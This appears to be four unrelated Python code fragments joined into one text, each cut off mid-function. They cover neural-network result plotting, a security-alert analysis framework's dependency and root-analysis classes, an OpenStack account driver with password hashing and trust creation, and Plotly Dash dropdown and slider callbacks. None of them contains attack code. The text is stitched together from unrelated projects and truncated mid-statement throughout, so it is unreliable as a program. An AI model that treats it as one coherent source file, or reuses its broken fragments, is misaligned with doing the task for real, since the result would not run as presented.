relative_importance_100, relative_importance_negative,
self.get_network_weights()]
gross_network_labels = ['Network structure: , Inputs, Hidden, Outputs',
'Activation functions: 0= Sigmoid, 1= Tanh, 2= Softmax, for I-H, for H-O',
'Error advance: Total error at the end of each epoch',
'Run conditions: , Number of Epochs, Tolerance',
'Correlation coefficients: (A number per output)',
'Sum of errors: , Total Error, MSE, RMSE',
'Error details: (Total Error; MSE{per output}; RMSE{per output})',
'Relative contributions (+ve only): of each input (columns) to each output (rows)',
'Relative contributions (real values): of each input (columns) to each output (rows)',
'Weights and biases: Weights I-H (rows= inputs); a row for H bias; & other for O bias']
self.save_to_file(1, (gross_network_results, gross_network_labels), clear_file=clear_file_state)
# self.store_outputs_to_file(gross_network_results, gross_network_labels, clear_file_state)
pass
def get_normalized_input_line(self, input_line):
"""
Convert an input dataline to normalized form
@param input_line: the data in raw format
@return: data in normalized format
"""
norm_line = []
for i, cell in enumerate(input_line):
norm_data = self.source_data.input_variables[i].get_normalized_value(cell)
if not isinstance(norm_data, list): # only at the beginning
norm_line.append(norm_data)
else:
norm_line.extend(norm_data)
return norm_line
def get_de_normalized_output_line(self, output_line):
"""
Convert normalized outputs to readable raw format
@param output_line: list of normalized outputs
@return: list of readable output format
"""
var_map = self.get_variables_info('loc')
var_types_bool = self.get_variables_info('bool')
output_vars = self.source_data.output_variables
tmp = []
finished_output_variables = []
for o, out in enumerate(output_line):
if var_map[1][o] not in finished_output_variables:
if var_types_bool[1][o]: # Numeric output
tmp.append(output_vars[o].get_de_normalized_value(out))
finished_output_variables.append(var_map[1][o])
else:
rep = var_map[1].count(var_map[1][o])
tmp2 = output_line[o: o + rep]
# tmp2 = map(lambda x: 1 if x >= 0.5 else 0, tmp2)
tmp.append(output_vars[o].get_de_normalized_value(tmp2))
finished_output_variables.append(var_map[1][o])
return tmp
def graph_results(self, error_list, graphing_data_collection, optional_errors=None, partitioned_data=None,
initial_time=0):
"""
The most important routine in the program. To plot all results in an understandable form
@param error_list: the list of costs
@param graphing_data_collection: the data needed to plot all results
@param optional_errors: if there are some additional errors (like that of validation and testing)
@param partitioned_data: The way of partitioning data to TRN:VLD:TST
@param initial_time: the at whish the study started
@return: pass, Just outputs graphs in pdf format or in windows format
"""
figure_number = 0
figure_page = []
pages_titles = ['Cost function during simulation stages',
"The full neural network with weights' effects",
"Consolidated neural network with weights' effects",
"Relative importance of inputs to outputs",
"Prediction function and data cloud",
"Real vs. predicted data"]
# Limiting data points to maximum of 1000 point to speedup drawing
max_len = 1000
limited_graphing_data_collection = []
for stage in graphing_data_collection:
if len(stage) > max_len:
guide = range(len(stage))
random.shuffle(guide)
guide = guide[:max_len]
dummy_ = []
for selected in guide:
dummy_.append(stage[selected])
limited_graphing_data_collection.append(dummy_)
else:
limited_graphing_data_collection.append(stage)
def save_graph_data(filename, x_and_y_list_of_tuples):
"""
A function to print the data of each graph page to a csv file
:param filename: the filename to be saved as
:param x_and_y_list_of_tuples: a list of several members, each member is a tuple, each tuple contains
2 members; GraphTitles and GraphData, GraphTitles is a tuple contains Chart Title, X Title, Y Title
GraphData is a tuple contains (X, Y) each as a list.
Example
x_and_y_list_of_tuples = [(('klkl vs yuyu', 'klkl in kg', 'yuyu in m'), (X, Y)),
(('klkl vs asdr', 'klkl in kg', 'asdr in s'), (X, Z)),
(('qwer vs yuyu', 'qwer in F', 'yuyu in m'), (F, Y)),
(('asdr vs mdfg', 'asdr in s', 'mdfg in N'), (Z, R))]
"""
file_name = self.new_folder_path + '\\' + filename
open(file_name, "w").close()
graph_file = open(file_name, "a")
chart_number = 0
for tup in x_and_y_list_of_tuples:
if len(tup[1][0]) > 0:
chart_number += 1
graph_file.writelines("Graph #" + str(chart_number) + '\n\n')
graph_file.writelines(tup[0][0] + '\n\n' + tup[0][1] + ", " + tup[0][2] + '\n')
for j in range(len(tup[1][0])):
line = str(tup[1][0][j])
for ij in range(1, len(tup[1])):
line += ", " + str(tup[1][ij][j])
graph_file.writelines(str(line) + '\n')
graph_file.writelines("\n===========================" + '\n\n')
graph_file.close()
def draw_cost_function():
"""
Draws the cost function(s) of training, testing, validation,
and all other costs like that of selecting structure
@return: A graphs figure
"""
titles_font = 16
labels_font = 14
caption_font = 25
# plt.rcParams["figure.figsize"] = [12, 9]
data_save_lists = [] # [() for i in range (5)]
y = error_list if optional_errors is None else optional_errors[0]
x = range(len(y))
plots_in_fig = (2, 6)
# Note that, unlike matplotlib’s subplot, the index of subplot2grid starts from 0 in gridspec.
ax1 = plt.subplot2grid(plots_in_fig, (0, 0), colspan=2)
plt.plot(x, y, 'r', marker='.')
chart_title = 'Error development during training' if optional_errors is None \
else 'Error development during early validation'
plt.title(chart_title, fontsize=titles_font, weight='bold', color='maroon')
plt.xlabel('Epochs', fontsize=labels_font, weight='bold')
plt.ylabel('Cost/error', fontsize=labels_font, weight='bold')
# plt.title(chart_title, weight='bold', color='maroon')
# plt.xlabel('Epochs', weight='bold')
# plt.ylabel('Cost/error', weight='bold')
plt.grid(True)
# saving data to file
data_save_lists.append(((chart_title, 'Epochs', 'Cost/error'), (x, y)))
if optional_errors is not None:
# ===============================================================
# Graphing the validation error
y = optional_errors[1]
x = range(len(y))
# Note that, unlike matplotlib’s subplot, the index of subplot2grid starts from 0 in gridspec.
ax1 = plt.subplot2grid(plots_in_fig, (0, 2), colspan=2)
plt.plot(x, y, 'b', marker='.')
plt.title('Error development during training', fontsize=titles_font, weight='bold', color='maroon')
plt.xlabel('Epochs', fontsize=labels_font, weight='bold')
# plt.title('Error development during training', weight='bold', color='maroon')
# | |
AnalysisDependency.STATUS_RESOLVED
@property
def ready(self):
"""Returns True if target analysis has not been completed."""
return self.status == AnalysisDependency.STATUS_READY
@property
def completed(self):
"""Returns True if the target analysis has been completed."""
return self.status == AnalysisDependency.STATUS_COMPLETED
@property
def resolved(self):
"""Returns True if the source analysis has been completed."""
return self.status == AnalysisDependency.STATUS_RESOLVED
def increment_status(self):
if self.status == AnalysisDependency.STATUS_READY:
self.status = AnalysisDependency.STATUS_COMPLETED
elif self.status == AnalysisDependency.STATUS_COMPLETED:
self.status = AnalysisDependency.STATUS_RESOLVED
@property
def score(self):
score = 0
node = self.next
while node:
score += 1
node = node.next
return score
@property
def failed(self):
"""Returns True if this dependency (or any in the chain of dependencies) has failed."""
node = self
while node:
if node.status == AnalysisDependency.STATUS_FAILED:
return True
node = node.next
return False
@property
def delayed(self):
"""Returns True if the target analysis (or any in the chain of dependencies) is delayed."""
if not self.root:
raise RuntimeError("delayed property of AnalysisDependency called before root property was set")
node = self
while node:
target_analysis = self.root.get_observable(node.target_observable_id).get_analysis(node.target_analysis_type)
if target_analysis and target_analysis.delayed:
return True
node = node.next
return False
@property
def json(self):
return {
AnalysisDependency.KEY_TARGET_OBSERVABLE_ID: self.target_observable_id,
AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE: self.target_analysis_type,
AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID: self.source_observable_id,
AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE: self.source_analysis_type,
AnalysisDependency.KEY_STATUS: self.status,
AnalysisDependency.KEY_FAILURE_REASON: self.failure_reason,
}
@staticmethod
def from_json(json_dict):
"""Returns a new AnalysisDependency object from the given JSON dict."""
return AnalysisDependency(target_observable_id=json_dict[AnalysisDependency.KEY_TARGET_OBSERVABLE_ID],
target_analysis_type=json_dict[AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE],
source_observable_id=json_dict[AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID],
source_analysis_type=json_dict[AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE],
status=json_dict[AnalysisDependency.KEY_STATUS],
failure_reason=json_dict[AnalysisDependency.KEY_FAILURE_REASON])
def __str__(self):
return "Analysis Dependency {}({}) --> {}({}) ({}){}".format(
self.source_analysis_type,
self.source_observable_id if self.root is None else self.source_observable,
self.target_analysis_type,
self.target_observable_id if self.root is None else self.target_observable,
self.status,
' failure reason: {}'.format(self.failure_reason) if self.failure_reason else '')
def __repr__(self):
return self.__str__()
@property
def target_observable(self):
"""Returns the target Observable that needs to be analyzed."""
if self._target_observable:
return self._target_observable
self._target_observable = self.root.get_observable(self.target_observable_id)
return self._target_observable
@property
def source_observable(self):
"""Returns the Observable that was being analyzed when the request was made."""
if self._source_observable:
return self._source_observable
self._source_observable = self.root.get_observable(self.source_observable_id)
return self._source_observable
#
# saq.database.Alert vs saq.analysis.Alert
# This system is designed to work both with and without the database running.
# This means you can load Alert objects directly from the JSON rather than
# requiring you to do a database query first.
#
# The hiearchy of relationships goes Analysis --> Alert --> saq.database.Alert
#
class RootAnalysis(Analysis):
"""Root of analysis. Also see saq.database.Alert."""
def __init__(self,
tool=None,
tool_instance=None,
alert_type=None,
desc=None,
event_time=None,
action_counters=None,
details=None,
name=None,
remediation=None,
state=None,
uuid=None,
location=None,
storage_dir=None,
company_name=None,
company_id=None,
analysis_mode=None,
*args, **kwargs):
import uuid as uuidlib
super().__init__(*args, **kwargs)
# this is set to True if a field backed by JSON is modified
# XXX for now we just force this to write every time
# XXX it's going to be complex to track all the changes in the tree without a proper event system
self._is_modified = True
# we are the root
self.root = self
self._analysis_mode = None
if analysis_mode:
self.analysis_mode = analysis_mode
self._uuid = str(uuidlib.uuid4()) # default is new uuid
if uuid:
self.uuid = uuid
self._tool = None
if tool:
self.tool = tool
self._tool_instance = None
if tool_instance:
self.tool_instance = tool_instance
self._alert_type = None
if alert_type:
self.alert_type = alert_type
self._description = None
if desc:
self.description = desc
self._event_time = None
if event_time:
self.event_time = event_time
self._name = None
if name:
self.name = name
self._remediation = None
if remediation:
self.remediation = remediation
self._details = None
if details:
self.details = details
self._action_counters = {}
if action_counters:
self.action_counters = action_counters
self._location = None
if location:
self.location = location
else:
# if a location is not specified then we default to locally defined value
self.location = saq.SAQ_NODE
self._storage_dir = None
if storage_dir:
self.storage_dir = storage_dir
self._state = {}
if state:
self.state = state
self._company_name = None
try:
# we take the default company ownership from the config file (if specified)
self._company_name = saq.CONFIG['global']['company_name']
except KeyError:
pass
if company_name:
self._company_name = company_name
try:
# we take the default company ownership from the config file (if specified)
self._company_id = saq.CONFIG['global'].getint('company_id')
except KeyError:
pass
if company_id:
self._company_id = company_id
# all of the Observables discovered during analysis go into the observable_store
# these objects are what are serialized to and from JSON
self._observable_store = {} # key = uuid, value = Observable object
# set to True after load() is called
self.is_loaded = False
# we keep track of when delayed initially starts here
# to allow for eventual timeouts when something is wrong
# key = analysis_module:observable_uuid
# value = datetime.datetime of when the first analysis request was made
self.delayed_analysis_tracking = {}
# list of AnalysisDependency objects
self.dependency_tracking = []
# we fire EVENT_GLOBAL_TAG_ADDED and EVENT_GLOBAL_OBSERVABLE_ADDED when we add tags and observables to anything
# (note that we also need to add these global event listeners when we deserialize)
self.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
self.add_event_listener(EVENT_OBSERVABLE_ADDED, self._fire_global_events)
def _fire_global_events(self, source, event_type, *args, **kwargs):
"""Fires EVENT_GLOBAL_* events."""
if event_type == EVENT_TAG_ADDED:
self.fire_event(source, EVENT_GLOBAL_TAG_ADDED, *args, **kwargs)
elif event_type == EVENT_OBSERVABLE_ADDED:
observable = args[0]
observable.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
observable.add_event_listener(EVENT_ANALYSIS_ADDED, self._fire_global_events)
self.fire_event(source, EVENT_GLOBAL_OBSERVABLE_ADDED, *args, **kwargs)
elif event_type == EVENT_ANALYSIS_ADDED:
analysis = args[0]
analysis.add_event_listener(EVENT_TAG_ADDED, self._fire_global_events)
analysis.add_event_listener(EVENT_OBSERVABLE_ADDED, self._fire_global_events)
self.fire_event(source, EVENT_GLOBAL_ANALYSIS_ADDED, *args, **kwargs)
else:
logging.error("unsupported global event type: {}".format(event_type))
#
# the json property is used for internal storage
#
# json keys
KEY_ANALYSIS_MODE = 'analysis_mode'
KEY_ID = 'id'
KEY_UUID = 'uuid'
KEY_TOOL = 'tool'
KEY_TOOL_INSTANCE = 'tool_instance'
KEY_TYPE = 'type'
KEY_DESCRIPTION = 'description'
KEY_EVENT_TIME = 'event_time'
KEY_ACTION_COUNTERS = 'action_counters'
KEY_DETAILS = 'details'
KEY_OBSERVABLE_STORE = 'observable_store'
KEY_NAME = 'name'
KEY_REMEDIATION = 'remediation'
KEY_STATE = 'state'
KEY_LOCATION = 'location'
KEY_NETWORK = 'network'
KEY_COMPANY_NAME = 'company_name'
KEY_COMPANY_ID = 'company_id'
KEY_DELAYED_ANALYSIS_TRACKING = 'delayed_analysis_tracking'
KEY_DEPENDECY_TRACKING = 'dependency_tracking'
@property
def json(self):
result = Analysis.json.fget(self)
result.update({
RootAnalysis.KEY_ANALYSIS_MODE: self.analysis_mode,
RootAnalysis.KEY_UUID: self.uuid,
RootAnalysis.KEY_TOOL: self.tool,
RootAnalysis.KEY_TOOL_INSTANCE: self.tool_instance,
RootAnalysis.KEY_TYPE: self.alert_type,
RootAnalysis.KEY_DESCRIPTION: self.description,
RootAnalysis.KEY_EVENT_TIME: self.event_time,
RootAnalysis.KEY_ACTION_COUNTERS: self.action_counters,
#RootAnalysis.KEY_DETAILS: self.details, <-- this is saved externally
RootAnalysis.KEY_OBSERVABLE_STORE: self.observable_store,
RootAnalysis.KEY_NAME: self.name,
RootAnalysis.KEY_REMEDIATION: self.remediation,
RootAnalysis.KEY_STATE: self.state,
RootAnalysis.KEY_LOCATION: self.location,
RootAnalysis.KEY_COMPANY_NAME: self.company_name,
RootAnalysis.KEY_COMPANY_ID: self.company_id,
RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING: self.delayed_analysis_tracking,
RootAnalysis.KEY_DEPENDECY_TRACKING: self.dependency_tracking,
})
return result
@json.setter
def json(self, value):
assert isinstance(value, dict)
# this is important to do first before we load Observable references
if RootAnalysis.KEY_OBSERVABLE_STORE in value:
self.observable_store = value[RootAnalysis.KEY_OBSERVABLE_STORE]
Analysis.json.fset(self, value)
# load this alert from the given json data
if RootAnalysis.KEY_ANALYSIS_MODE in value:
self.analysis_mode = value[RootAnalysis.KEY_ANALYSIS_MODE]
if RootAnalysis.KEY_UUID in value:
self.uuid = value[RootAnalysis.KEY_UUID]
if RootAnalysis.KEY_TOOL in value:
self.tool = value[RootAnalysis.KEY_TOOL]
if RootAnalysis.KEY_TOOL_INSTANCE in value:
self.tool_instance = value[RootAnalysis.KEY_TOOL_INSTANCE]
if RootAnalysis.KEY_TYPE in value:
self.alert_type = value[RootAnalysis.KEY_TYPE]
if RootAnalysis.KEY_DESCRIPTION in value:
self.description = value[RootAnalysis.KEY_DESCRIPTION]
if RootAnalysis.KEY_EVENT_TIME in value:
self.event_time = value[RootAnalysis.KEY_EVENT_TIME]
if RootAnalysis.KEY_ACTION_COUNTERS in value:
self.action_counters = value[RootAnalysis.KEY_ACTION_COUNTERS]
if RootAnalysis.KEY_NAME in value:
self.name = value[RootAnalysis.KEY_NAME]
if RootAnalysis.KEY_REMEDIATION in value:
self.remediation = value[RootAnalysis.KEY_REMEDIATION]
if RootAnalysis.KEY_STATE in value:
self.state = value[RootAnalysis.KEY_STATE]
if RootAnalysis.KEY_LOCATION in value:
self.location = value[RootAnalysis.KEY_LOCATION]
if RootAnalysis.KEY_COMPANY_NAME in value:
self.company_name = value[RootAnalysis.KEY_COMPANY_NAME]
if RootAnalysis.KEY_COMPANY_ID in value:
self.company_id = value[RootAnalysis.KEY_COMPANY_ID]
if RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING in value:
self.delayed_analysis_tracking = value[RootAnalysis.KEY_DELAYED_ANALYSIS_TRACKING]
for key in self.delayed_analysis_tracking.keys():
self.delayed_analysis_tracking[key] = dateutil.parser.parse(self.delayed_analysis_tracking[key])
if RootAnalysis.KEY_DEPENDECY_TRACKING in value:
self.dependency_tracking = value[RootAnalysis.KEY_DEPENDECY_TRACKING]
@property
def analysis_mode(self):
return self._analysis_mode
@analysis_mode.setter
def analysis_mode(self, value):
assert value is None or ( isinstance(value, str) and value )
self._analysis_mode = value
@property
def uuid(self):
return self._uuid
@uuid.setter
def uuid(self, value):
assert isinstance(value, str)
self._uuid = value
self.set_modified()
@property
def tool(self):
"""The name of the tool that generated the alert (ex: splunk)."""
return self._tool
@tool.setter
def tool(self, value):
assert value is None or isinstance(value, str)
self._tool = value
self.set_modified()
@property
def tool_instance(self):
"""The instance of the tool that generated the alert (ex: the hostname of the sensor)."""
return self._tool_instance
@tool_instance.setter
def tool_instance(self, value):
assert value is None or isinstance(value, str)
self._tool_instance = value
self.set_modified()
@property
def alert_type(self):
"""The type of the alert (ex: splunk - ipv4 search)."""
return self._alert_type
@alert_type.setter
def alert_type(self, value):
assert value is None or isinstance(value, str)
self._alert_type = value
self.set_modified()
@property
def description(self):
"""A brief one line description of the alert (ex: high_pdf_xor_kernel32 match in email attachment)."""
return self._description
@description.setter
def description(self, value):
assert value is None or isinstance(value, str)
self._description = value
self.set_modified()
@property
def event_time(self):
"""Returns a datetime object representing the time this event was created or occurred."""
return self._event_time
@event_time.setter
def event_time(self, value):
"""Sets the | |
'sha_v1':
return self.sha_v1_hashpass(username, cloud_pass)
else:
return self.sha_v2_hashpass(username, cloud_pass)
def sha_v2_hashpass(self, username, cloud_pass):
if not cloud_pass or len(cloud_pass) < 32:
raise ValueError("Cloud config ['user']['secret'] is required and " +
"must be of length 32 or more")
if not username:
raise ValueError("Missing username, cannot create hash")
return sha256(username + cloud_pass).hexdigest()
def sha_v1_hashpass(self, username, cloud_pass):
if not cloud_pass:
raise ValueError("Cloud config ['user']['secret'] is required")
if not username:
raise ValueError("Missing username, cannot create hash")
return sha256(cloud_pass + username).hexdigest()
def crypt_hashpass(self, username):
"""
Create a unique password using 'username'
"""
import crypt
cloud_pass = self.get_config('user', 'secret', None)
secret_salt = str(cloud_pass).translate(None, string.punctuation)
password = crypt.crypt(username, secret_salt)
return password
def get_admin_username(self):
return self.user_manager.keystone.username
def get_project_name_for(self, username):
"""
This should always map project to user
For now, they are identical..
TODO: Make this intelligent. use keystone.
"""
return username
def _get_image(self, *args, **kwargs):
return self.image_manager.get_image(*args, **kwargs)
# For one-time caching
def _list_all_images(self, *args, **kwargs):
return self.image_manager.list_images(*args, **kwargs)
def tenant_instances_map(
self,
status_list=[],
match_all=False,
include_empty=False):
"""
Maps 'Tenant' objects to all the 'owned instances' as listed by the admin driver
Optional fields:
* status_list (list) - If provided, only include instance if it's status/tmp_status matches a value in the list.
* match_all (bool) - If True, instances must match ALL words in the list.
* include_empty (bool) - If True, include ALL tenants in the map.
"""
all_projects = self.list_projects()
all_instances = self.list_all_instances()
if include_empty:
project_map = {proj: [] for proj in all_projects}
else:
project_map = {}
for instance in all_instances:
try:
# NOTE: will someday be 'projectId'
tenant_id = instance.extra['tenantId']
project = [p for p in all_projects if p.id == tenant_id][0]
except (ValueError, KeyError):
raise Exception(
"The implementaion for recovering a tenant id has changed. Update the code base above this line!")
metadata = instance._node.extra.get('metadata', {})
instance_status = instance.extra.get('status')
task = instance.extra.get('task')
tmp_status = metadata.get('tmp_status', '')
if status_list:
if match_all:
truth = all(
True if (
status_name and status_name in [
instance_status,
task,
tmp_status]) else False for status_name in status_list)
else:
truth = any(
True if (
status_name and status_name in [
instance_status,
task,
tmp_status]) else False for status_name in status_list)
if not truth:
logger.info(
"Found an instance:%s for tenant:%s but skipped because %s could be found in the list: (%s - %s - %s)" %
(instance.id,
project.name,
"none of the status_names" if not match_all else "not all of the status names",
instance_status,
task,
tmp_status))
continue
instance_list = project_map.get(project, [])
instance_list.append(instance)
project_map[project] = instance_list
return project_map
def list_all_instances(self, **kwargs):
return self.admin_driver.list_all_instances(**kwargs)
def list_all_images(self, **kwargs):
all_images = self.image_manager.list_images(**kwargs)
return all_images
def list_all_snapshots(self, **kwargs):
return [img for img in self.list_all_images(**kwargs)
if 'snapshot' in img.get('image_type', 'image').lower()]
def get_project_by_id(self, project_id):
return self.user_manager.get_project_by_id(project_id)
def get_project(self, project_name, **kwargs):
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs)
return self.user_manager.get_project(project_name, **kwargs)
def _make_tenant_id_map(self):
all_projects = self.list_projects()
tenant_id_map = {project.id: project.name for project in all_projects}
return tenant_id_map
def create_trust(
self,
trustee_project_name, trustee_username, trustee_domain_name,
trustor_project_name, trustor_username, trustor_domain_name,
roles=[], impersonation=True):
"""
Trustee == Consumer
Trustor == Resource Owner
Given the *names* of projects, users, and domains
gather all required information for a Trust-Create
create a new trust object
NOTE: we set impersonation to True
-- it has a 'normal default' of False!
"""
default_roles = [{"name": "admin"}]
trustor_domain = self.openstack_sdk.identity.find_domain(
trustor_domain_name)
if not trustor_domain:
raise ValueError("Could not find trustor domain named %s"
% trustor_domain_name)
trustee_domain = self.openstack_sdk.identity.find_domain(
trustee_domain_name)
if not trustee_domain:
raise ValueError("Could not find trustee domain named %s"
% trustee_domain_name)
trustee_user = self.get_user(
trustee_username, domain_id=trustee_domain.id)
# trustee_project = self.get_project(
# trustee_username, domain_name=trustee_domain.id)
trustor_user = self.get_user(
trustor_username, domain_id=trustor_domain.id)
trustor_project = self.get_project(
trustor_project_name, domain_id=trustor_domain.id)
if not roles:
roles = default_roles
new_trust = self.openstack_sdk.identity.create_trust(
impersonation=impersonation,
project_id=trustor_project.id,
trustor_user_id=trustor_user.id,
trustee_user_id=trustee_user.id,
roles=roles,
domain_id=trustee_domain.id)
return new_trust
def list_trusts(self):
return [t for t in self.openstack_sdk.identity.trusts()]
def clear_local_cache(self):
logger.info("Clearing the cached project-list")
self.project_list = []
def list_projects(self, force=False, **kwargs):
"""
Cached to save time on repeat queries.. Otherwise its a pass-through to user_manager
"""
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs, domain_override='domain')
if not getattr(self, 'project_list', None) or force:
logger.info("Caching a copy of project list")
self.project_list = self.user_manager.list_projects(**kwargs)
return self.project_list
logger.info("Returning cached copy of project list")
return self.project_list
def list_roles(self, **kwargs):
"""
Keystone already accepts 'domain_name' to restrict what roles to return
"""
return self.user_manager.keystone.roles.list(**kwargs)
def get_role(self, role_name_or_id, **list_kwargs):
if self.identity_version > 2:
list_kwargs = self._parse_domain_kwargs(list_kwargs)
role_list = self.list_roles(**list_kwargs)
found_roles = [role for role in role_list if role.id == role_name_or_id or role.name == role_name_or_id]
if not found_roles:
return None
if len(found_roles) > 1:
raise Exception("role name/id %s matched more than one value -- Fix the code" % (role_name_or_id,))
return found_roles[0]
def get_user(self, user_name_or_id, **list_kwargs):
user_list = self.list_users(**list_kwargs)
found_users = [user for user in user_list if user.id == user_name_or_id or user.name == user_name_or_id]
if not found_users:
return None
if len(found_users) > 1:
raise Exception("User name/id %s matched more than one value -- Fix the code" % (user_name_or_id,))
return found_users[0]
def _parse_domain_kwargs(self, kwargs, domain_override='domain_id', default_domain='default'):
"""
CLI's replace domain_name with the actual domain.
We replicate that functionality to avoid operator-frustration.
"""
domain_key = 'domain_name'
if self.identity_version <= 2:
return kwargs
if domain_override in kwargs:
if domain_key in kwargs:
kwargs.pop(domain_key)
return kwargs
if domain_key not in kwargs:
kwargs[domain_key] = default_domain # Set to default domain
domain_name_or_id = kwargs.get(domain_key)
domain = self.openstack_sdk.identity.find_domain(domain_name_or_id)
if not domain:
raise ValueError("Could not find domain %s by name or id."
% domain_name_or_id)
kwargs.pop(domain_key, '')
kwargs[domain_override] = domain.id
return kwargs
def list_users(self, **kwargs):
if self.identity_version > 2:
kwargs = self._parse_domain_kwargs(kwargs, domain_override='domain')
return self.user_manager.keystone.users.list(**kwargs)
def get_quota_limit(self, username, project_name):
limits = {}
abs_limits = self.get_absolute_limits()
user_limits = self.get_user_limits(username, project_name)
if abs_limits:
limits.update(abs_limits)
if user_limits:
limits.update(user_limits)
return limits
def get_absolute_limits(self):
limits = {}
os_limits = self.admin_driver._connection.ex_get_limits()
try:
absolute_limits = os_limits['absolute']
limits['cpu'] = absolute_limits['maxTotalCores']
limits['floating_ips'] = absolute_limits['maxTotalFloatingIps']
limits['instances'] = absolute_limits['maxTotalInstances']
limits['keypairs'] = absolute_limits['maxTotalKeypairs']
limits['ram'] = absolute_limits['maxTotalRAMSize']
except:
logger.exception("The method for 'reading' absolute limits has changed!")
return limits
def get_user_limits(self, username, project_name):
limits = {}
try:
user_id = self.get_user(username).id
except:
logger.exception("Failed to find user %s" % username)
raise ValueError ("Unknown user %s" % username)
try:
project_id = self.get_project(project_name).id
except:
logger.exception("Failed to find project %s" % project_name)
raise ValueError ("Unknown project %s" % project_name)
user_limits = self._ex_list_quota_for_user(user_id, project_id)
if not user_limits:
return limits
try:
user_quota = user_limits['quota_set']
limits['cpu'] = user_quota['cores']
limits['floating_ips'] = user_quota['floating_ips']
limits['instances'] = user_quota['instances']
limits['keypairs'] = user_quota['key_pairs']
limits['ram'] = user_quota['ram']
except:
logger.exception("The method for 'reading' absolute limits has changed!")
return limits
def _ex_list_quota_for_user(self, user_id, tenant_id):
"""
"""
server_resp = self.admin_driver._connection.connection.request('/os-quota-sets/%s?user_id=%s'
% (tenant_id, user_id))
quota_obj = server_resp.object
return quota_obj
def list_usergroup_names(self):
return [user.name for (user, project) in self.list_usergroups()]
def list_usergroups(self):
"""
TODO: This function is AWFUL just scrap it.
"""
users = self.list_users()
groups = self.list_projects()
usergroups = []
admin_usernames = self.core_provider.list_admin_names()
for group in groups:
for user in users:
if user.name in admin_usernames:
continue
if user.name in group.name:
usergroups.append((user, group))
break
return usergroups
def _get_horizon_url(self, tenant_id):
parsed_url = urlparse(self.provider_creds["auth_url"])
return "https://%s/horizon/auth/switch/%s/?next=/horizon/project/" %\
(parsed_url.hostname, tenant_id)
def get_openstack_clients(self, username, password=None, tenant_name=None):
# Build credentials for each manager
all_creds = self._get_openstack_credentials(
username, password, tenant_name)
# Initialize managers with respective credentials
all_clients = self.get_user_clients(all_creds)
openstack_sdk = self.get_openstack_sdk_client(all_creds)
neutron = self.get_neutron_client(all_creds)
glance = self.get_glance_client(all_creds)
tenant = self.get_project(tenant_name)
tenant_id = tenant.id if tenant else None
all_clients.update({
"glance": glance,
"neutron": neutron,
"openstack_sdk": openstack_sdk,
"horizon": self._get_horizon_url(tenant_id)
})
return all_clients
def get_openstack_client(self, identity, client_name):
identity_creds = self.parse_identity(identity)
username = identity_creds["username"]
password = identity_creds["password"]
project_name = identity_creds["tenant_name"]
all_creds = self._get_openstack_credentials(
username, password, project_name)
if client_name == 'neutron':
return self.get_neutron_client(all_creds)
elif client_name == 'glance':
return self.get_glance_client(all_creds)
elif client_name == 'keystone':
return self.get_user_clients(all_creds)['keystone']
elif client_name == 'nova':
return self.get_user_clients(all_creds)['nova']
elif client_name == 'swift':
return self.get_user_clients(all_creds)['swift']
elif client_name == 'openstack':
return self.get_openstack_sdk_client(all_creds)
else:
raise ValueError("Invalid client_name %s" % client_name)
def get_legacy_glance_client(self, all_creds):
all_creds['admin_url'] = all_creds['admin_url'] + '/v2.0'
all_creds['auth_url'] = all_creds['auth_url'] + '/v2.0'
keystone = _connect_to_keystone_v2(**all_creds)
mgr_keystone = self.user_manager.keystone
glance_service = mgr_keystone.services.find(type='image')
glance_endpoint_obj = mgr_keystone.endpoints.find(service_id=glance_service.id)
glance_endpoint = glance_endpoint_obj.publicurl
return _connect_to_glance_by_auth(endpoint=glance_endpoint, session=keystone.session)
def get_glance_client(self, all_creds):
if 'ex_force_auth_version' in all_creds and all_creds['ex_force_auth_version'] == '2.0_password':
return self.get_legacy_glance_client(all_creds)
# Remove lines above when legacy cloud compatability is removed
image_creds | |
showline=True, showspikes=True, spikethickness=1, spikedash='solid',
mirror=True, tickformat=".1f", title_standoff=10, range=[0, scaleup(df[x].max())]
).update_yaxes(spikedash='solid',
showgrid=False,
title_standoff=10,
title=dict(
text=y.translate(
SUP),
standoff=5),
autorange=True,
ticks='outside',
showspikes=True,
spikethickness=1,
showline=True,
mirror=True,
tickformat=".1f",
range=[0, scaleup(df[y].max())]
).update_layout(
clickmode='event+select', hovermode='closest', margin={'l': 80}, autosize=True, font=dict(family='Helvetica')
).update_traces(marker=dict(opacity=0.7, line=dict(width=0.5, color='DarkSlateGrey'),
))
# POPULATE AXIS DROPDOWN 3VAR ENV ANIM
@app.callback([Output('xaxis-anim-3D', 'options'),
Output('yaxis-anim-3D', 'options'),
Output('caxis-anim-3D', 'options')],
[Input('csv-data', 'data')])
def populate_dropdown_3var_anim(data):
if not data:
return dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
options = [{'label': i, 'value': i} for i in df.columns]
return options, options, options
# POPULATE COLORBAR SLIDER SCATTER 3VAR ENV ANIM
@app.callback([Output('colorbar-slider', 'min'),
Output('colorbar-slider', 'max'),
Output('colorbar-slider', 'step'),
Output('colorbar-slider', 'value')
],
[Input('csv-data', 'data'),
Input('caxis-anim-3D', 'value')
],
[State('csv-data', 'data')])
def populate_pressure_slider_3Var(_, color, data):
if not data or not color:
return dash.no_update, dash.no_update, dash.no_update, dash.no_update
df = pd.read_json(data, orient='split')
min_v = round(float(df[color].min()), 1)
max_v = round(float(df[color].max()), 1)
step = 0.1
value = [round(float(df[color].min()), 1), round(float(df[color].max()), 1)]
return min_v, max_v, step, value
# STATE VALUE COLORBAR SLIDER SCATTER 3VAR ENV ANIM
@app.callback(
Output('slider-output-container', 'children'),
[Input('colorbar-slider', 'value')])
def update_output_3Var(value):
return 'You have selected "{}"'.format(value)
# POPULATE 3VAR ENV ANIM FRAME
@app.callback(
Output('anim-frame-3Var', 'options'),
[Input('csv-data', 'data')]
)
def populate_animation_frame_3var(data):
if not data:
return dash.no_update
df = pd.read_json(data, orient='split')
dff = df.select_dtypes(exclude=['object'])
